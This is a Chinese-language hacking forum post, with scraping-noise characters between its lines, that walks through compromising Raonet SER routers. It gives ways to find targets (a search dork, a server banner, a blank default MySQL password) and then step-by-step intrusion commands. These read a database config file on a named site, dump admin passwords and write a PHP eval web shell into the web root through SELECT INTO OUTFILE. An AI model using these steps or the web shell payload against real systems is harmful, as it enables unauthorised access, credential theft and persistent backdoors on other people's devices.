寻找存在漏洞的路由器方法:
9 {; B8 m* f( t& e: q1 r/ \ g# w a) K
1:google搜索'Raonet Subscriber Ethernet Router'
1 `9 ?0 O4 U. c" _9 @2 z( O( o8 ]0 i `
2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001) ^! {1 D# ]" e( c3 c; ~* W% t
8 c3 D/ a' Y7 u
3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
" A4 V2 j* @- A% I: k% g" ]' Y5 @: k) C8 R9 \: A/ R4 |
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......: L( \3 Y$ l! h: G# d
2 L, h. p, F' s2 ] . a* f- u: U) b4 \
, Q- [+ z) ^! E' h# ^入侵步骤:/ v$ E0 r/ H, j g! I+ C, y
) O3 r1 B7 V( o5 z; i
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
# u n" {& W& m1 o; B0 S
+ M; O% \$ B$ R% U* @ K2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc5 T0 E: w6 g5 r1 G- G2 ]& E
3:得到密码后连接,查看GUI管理密码:
& K# W! S: W. C" Huse ser_500
/ t$ ^0 ~+ k/ V. |0 Z" I' sselect id,passwd from user;6 @1 P l; I; f2 @" [
4:通过数据库写入webshell,执行命令:
1 c O) z, c( W7 P7 D! @/ _) W7 Buse mysql;
2 ?. F' G' K8 Lcreate table ok(cmd TEXT);: Z" C% q. {4 {" F
insert into ok values("<?php @eval($_POST[cmd])?>");
' ~* Y! o' m+ V, E* h& s2 ~3 z% zselect * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";$ [5 X# S* m$ |5 Y/ t* N
drop table ok;
' A2 Y3 f$ m$ S1 E3 [6 y& G: W3 \" A( d
5:连接后门shell.php - w: |2 D; c6 B) l' z! R- q6 E
9 k) B N3 s" |
6. 搞定!
% L3 c; M, C/ J- a+ _% I- j2 D- k1 {, ]
|